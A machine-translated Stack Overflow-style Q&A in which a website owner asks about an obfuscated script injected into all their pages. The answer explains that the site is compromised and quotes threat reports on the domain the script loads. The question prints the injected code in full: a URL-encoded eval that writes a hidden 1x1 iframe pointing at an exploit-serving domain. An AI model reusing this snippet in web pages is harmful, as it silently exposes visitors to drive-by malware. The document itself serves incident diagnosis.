javascript - 此站点可能正在分发恶意软件？奇怪的javascript？

Question

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%
70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33%
37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%
3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>

我的网站 www.safwanmanpower.com 在每个页面中都受到恶意软件脚本的攻击我不知道这个脚本是关于这个脚本如何使我的网站受到恶意软件影响的任何人？？

希望得到快速和积极的回应。

已编辑

sumone 如何在未经上传许可的情况下攻击我的网站？？

Answer 1

您的网站已被已知实体入侵。您的页面现在正在为您的访问者提供漏洞利用，并将他们置于危险之中。

立即关闭您的站点并引用:http://safeweb.norton.com/report/show?name=sedpoo.com

Threat ReportTotal threats found: 4Drive-By Downloads (what's this?)Threats found: 3Here is a complete list: (for more information about a specific threat, click on the Threat Name below)Threat Name:     HTTP Malicious Toolkit Variant Activity 15Location:    http://sedpoo.com/?687328Threat Name:     HTTP Malicious Toolkit Variant Activity 15Location:    http://sedpoo.com/?-560137484Threat Name:     HTTP Malicious Toolkit Variant Activity 15Location:    http://sedpoo.com/?2443640Viruses (what's this?)Threats found: 1Here is a complete list: (for more information about a specific threat, click on the Threat Name below)Threat Name:    Trojan.GenLocation:    http://sedpoo.com/des.jar

并且:http://www.google.co.uk/safebrowsing/diagnostic?site=sedpoo.com/

What is the current listing status for sedpoo.com?Site is listed as suspicious - visiting this web site may harm your computer.What happened when Google visited this site?Of the 1887 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-01-18, and the last time suspicious content was found on this site was on 2011-01-18.Malicious software includes 2478 exploit(s), 2135 trojan(s), 1508 scripting exploit(s).This site was hosted on 8 network(s) including AS4766 (Korea Telecom), AS51306 (UAIP), AS5610 (CZECH).Has this site acted as an intermediary resulting in further distribution of malware?Over the past 90 days, sedpoo.com appeared to function as an intermediary for the infection of 962 site(s) including feja-islame.com/, yaris-club.net/, cstbilisi.ge/.Has this site hosted malware?Yes, this site has hosted malicious software over the past 90 days. It infected 2519 domain(s), including yaris-club.net/, feja-islame.com/, bhiee.net/.How did this happen?In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

在您进一步研究威胁并准备好应对可能随之而来的潜在感染之前，我不会访问 sedpoo 攻击站点。启动虚拟机来访问站点是进一步调查的快速方法，而且不会让您的工作站和数据受到损害。